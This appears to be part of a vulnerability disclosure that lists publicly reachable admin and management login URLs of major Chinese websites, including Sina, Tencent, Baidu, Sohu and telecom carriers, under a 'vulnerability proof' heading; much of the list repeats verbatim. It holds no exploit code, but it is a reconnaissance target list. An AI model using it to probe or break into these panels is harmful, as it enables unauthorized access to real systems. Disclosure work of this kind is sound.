http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer/

网易

http://ria.go.163.com/login_old.php

http://product.game.163.com/admin%21index.action

http://data.ent.163.com/admin%21index.action

中国移动10086站

http://admin4.rd139.com/ngoss/Lo ... rnUrl=/Default.aspx

http://admin.jx.monternet.com/1860/

联通

http://58.254.132.78/Club/admin/adminIndex.jsp

http://shop.admin.10010.com/

http://admin2.10010.com/login/login_rollback.action

漏洞证明:

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html

http://job.cd.qq.com/admin/

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer

网易

http://ria.go.163.com/login_old.php